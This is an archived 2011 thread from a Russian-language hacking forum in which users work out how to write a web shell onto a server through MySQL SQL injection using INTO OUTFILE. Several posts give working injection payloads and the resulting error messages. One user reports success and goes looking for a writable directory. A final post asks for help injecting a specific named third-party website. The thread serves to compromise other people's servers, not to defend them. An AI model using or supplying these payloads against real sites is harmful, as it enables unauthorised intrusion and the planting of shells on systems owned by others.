ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.12.2011, 17:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
14597
Репутация:
0
|
|
Сообщение от None
Only schema showing, why?
no information.schema, information_schema must.
sorry for my english
|
|
|
|
23.12.2011, 18:00
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от None
через еррор-бейсед нельзя залить шелл
Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним
Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .
А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.
snet
Сообщение от None
1 and (select 1 into outfile '/путь/шелл.php' lines terminated by "")--
|
|
|
23.12.2011, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от KolosJey
KolosJey said:
Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним
Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .
А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.
snet
Код:
Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1
Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.
|
|
|
|
23.12.2011, 18:08
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Код:
Code:
select user from mysql.user where 1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "")--+
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "")--' at line 1
Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь. Ну если МОА не видит что ошибка СИНТАКСИСА, тут я бессилен
Запрос рабочий, если всё сделать правильно
|
|
|
|
23.12.2011, 18:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
14597
Репутация:
0
|
|
Да все норм, вывела ошибка:
Код:
Code:
Can't create/write to file '/адрес/файл.php' (Errcode: 13)
Осталось найти папку где есть права.
Спасибо вам обоим.
lightangel, "Thank you" does not smudge on bread. Give me a plus for the reputation |
|
|
|
23.12.2011, 18:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thank you Snet, worked properly.
|
|
|
|
23.12.2011, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Ух. В случае snet, всё элементарно, результат первого запроса, попадает во второй запрос, почему и невозможно раскрутить скуль обычным способом, и приходится использовать вывод в ошибке. Но для залития шелла, достаточно выполнить запрос:
SELECT column FROM table WHERE columns = false UNION SELECT 'test' INTO OUTFILE '/tmp/file.txt'
и при условии если директория доступна на запись для пользователя mysql, то первый запрос выполнится, файл успешно создастся.
Но в примере уважаемого пользователя KolosJey, ничего не получится, т.к. в данном подзапросе and (select 1 into outfile '/tmp/test.txt' lines terminated by "text") использование INTO OUTFILE нарушает синтаксис запроса, о чем и свидетельствует ошибка:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile
Ну если ОБЫЧНЫЕ ПОЛЬЗОВАТЕЛИ не научатся думать СВОЕЙ головой, тут я бессилен.
|
|
|
|
23.12.2011, 18:25
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от KolosJey
KolosJey said:
не самой скули, а варианта её эксплуатации.
Я бы даже сказал, варианта вывода на экран результата запроса. Если запрос направлен не на получение информации, а на внесение изменений (в файлы или базу), то без разницы, блайнд или нет.
Людям свойственно иногда ошибаться. Мы же не роботы.
"через еррор-бейсед нельзя залить шелл" (c) Expl0ited
|
|
|
|
23.12.2011, 18:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
14597
Репутация:
0
|
|
Спасибо что так суетитесь из-за моей проблемы
Действительно, вы оба правы. Можно было обычным способом отправить запрос:
union select 1,2,3,4,"blabla" into outfile "/asd", .
это 3 часовое ковыряние через error_base мне запудрило всю голову и я, почему-то, ограничил себя только им.
Но и вариант который привел КолосДжей тоже сработал. Записал его в свой справочник. Очень познавательно.
|
|
|
|
23.12.2011, 20:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Is there a way to inject this?
Код:
Code:
http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1
Nothing is working for me. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
